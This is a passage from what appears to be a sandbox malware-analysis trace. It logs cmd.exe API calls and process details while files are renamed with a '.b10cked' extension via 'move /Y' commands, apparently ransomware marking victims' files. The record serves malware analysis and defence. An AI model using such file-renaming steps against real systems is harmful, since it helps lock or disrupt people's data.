0x18 [0202.303] GetConsoleOutputCP () returned 0x1b5 [0202.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.303] GetUserDefaultLCID () returned 0x409 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa90, cchData=128 | out: lpLCData="0") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa90, cchData=128 | out: lpLCData="0") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa90, cchData=128 | out: lpLCData="1") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.304] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.304] GetConsoleTitleW (in: lpConsoleTitle=0x2a08c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.304] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.305] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.305] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.305] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.305] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.305] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.305] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.305] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.305] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.305] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.305] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.309] GetConsoleTitleW (in: lpConsoleTitle=0x16f788, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.310] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.310] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.310] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.310] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.310] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.312] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.312] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.312] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f544, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f53c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f53c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.313] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.313] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.313] _wcsicmp (_String1="nslist.hxl", _String2=".") returned 64 [0202.313] _wcsicmp (_String1="nslist.hxl", _String2="..") returned 64 [0202.313] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl")) returned 0x2022 [0202.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.313] SetErrorMode (uMode=0x0) returned 0x0 [0202.313] SetErrorMode (uMode=0x1) returned 0x0 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", nBufferLength=0x104, lpBuffer=0x16eecc, lpFilePart=0x16eeb4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", lpFilePart=0x16eeb4*="nslist.hxl") returned 0x25 [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.314] _wcsicmp (_String1="nslist.hxl", _String2=".") returned 64 [0202.314] _wcsicmp (_String1="nslist.hxl", _String2="..") returned 64 [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl")) returned 0x2022 [0202.314] SetErrorMode (uMode=0x0) returned 0x0 [0202.314] SetErrorMode (uMode=0x1) returned 0x0 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", nBufferLength=0x104, lpBuffer=0x16f348, lpFilePart=0x16f0e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", lpFilePart=0x16f0e0*="nslist.hxl") returned 0x25 [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] SetErrorMode (uMode=0x0) returned 0x0 [0202.314] SetErrorMode (uMode=0x1) returned 0x0 [0202.314] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked", nBufferLength=0x104, lpBuffer=0x16f550, lpFilePart=0x16f0e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked", lpFilePart=0x16f0e0*="nslist.hxl.b10cked") returned 0x2d [0202.314] SetErrorMode (uMode=0x0) returned 0x1 [0202.314] SetLastError (dwErrCode=0x0) [0202.314] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\nslist.hxl.b10cked")) returned 0xffffffff [0202.314] GetLastError () returned 0x2 [0202.314] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x16ea5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea5c) returned 0x2a0ed0 [0202.315] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x16ea5c | out: lpFindFileData=0x16ea5c) returned 0 [0202.315] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.315] GetLastError () returned 0x12 [0202.315] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x16ea5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea5c) returned 0x2a0ed0 [0202.315] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x16ea5c | out: lpFindFileData=0x16ea5c) returned 0 [0202.315] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.315] GetLastError () returned 0x12 [0202.316] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x2b1ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ad8) returned 0x2a0ed0 [0202.316] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x2b1ad8 | out: lpFindFileData=0x2b1ad8) returned 0 [0202.316] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.316] GetLastError () returned 0x12 [0202.316] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl", fInfoLevelId=0x1, lpFindFileData=0x2b1ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1ad8) returned 0x2a0ed0 [0202.316] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x2b1ad8 | out: lpFindFileData=0x2b1ad8) returned 0 [0202.316] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0202.316] GetLastError () returned 0x12 [0202.317] _get_osfhandle (_FileHandle=2) returned 0xb [0202.317] GetFileType (hFile=0xb) returned 0x2 [0202.317] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.317] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16ec2c | out: lpMode=0x16ec2c) returned 1 [0202.317] _get_osfhandle (_FileHandle=2) returned 0xb [0202.317] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x16ec60 | out: lpConsoleScreenBufferInfo=0x16ec60) returned 1 [0202.588] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.588] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eca0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.589] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x16ec84, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec84*=0x2c) returned 1 [0202.589] longjmp () [0202.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.589] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.589] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.589] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.589] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.589] SetConsoleInputExeNameW () returned 0x1 [0202.589] GetConsoleOutputCP () returned 0x1b5 [0202.589] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.589] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.590] exit (_Code=1) Process: id = "487" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16be0" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29481 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29482 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29483 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29484 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 29485 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29486 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29487 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29488 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29489 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29490 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29878 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29879 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29880 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29881 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 29882 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 29883 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29884 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29886 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29887 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29888 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29889 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29890 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29891 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29892 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 29893 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29894 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29895 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29896 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29897 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29898 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29899 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 29900 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 29901 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 684 os_tid = 0xfc8 [0202.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa54 | out: lpSystemTimeAsFileTime=0x20fa54*(dwLowDateTime=0xad74f140, dwHighDateTime=0x1d440a9)) [0202.406] GetCurrentProcessId () returned 0xd30 [0202.406] GetCurrentThreadId () returned 0xfc8 [0202.406] GetTickCount () returned 0x39201 [0202.406] QueryPerformanceCounter (in: lpPerformanceCount=0x20fa4c | out: lpPerformanceCount=0x20fa4c*=25919529195) returned 1 [0202.407] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.407] __set_app_type (_Type=0x1) [0202.407] __p__fmode () returned 0x76b331f4 [0202.407] __p__commode () returned 0x76b331fc [0202.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.407] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.407] GetCurrentThreadId () returned 0xfc8 [0202.407] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x38 [0202.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.407] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.407] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f9e4 | out: phkResult=0x20f9e4*=0x0) returned 0x2 [0202.407] VirtualQuery (in: lpAddress=0x20fa1b, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.407] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.408] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f9b4, dwLength=0x1c | out: lpBuffer=0x20f9b4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.408] GetConsoleOutputCP () returned 0x1b5 [0202.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.408] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.408] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.408] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.408] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.408] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.409] GetEnvironmentStringsW () returned 0x270190* [0202.409] FreeEnvironmentStringsW (penv=0x270190) returned 1 [0202.409] GetEnvironmentStringsW () returned 0x270190* [0202.409] FreeEnvironmentStringsW (penv=0x270190) returned 1 [0202.409] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e954 | out: phkResult=0x20e954*=0x40) returned 0x0 [0202.409] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e95c, lpData=0x20e960, lpcbData=0x20e958*=0x1000 | out: lpType=0x20e95c*=0x0, lpData=0x20e960*=0xb8, lpcbData=0x20e958*=0x1000) returned 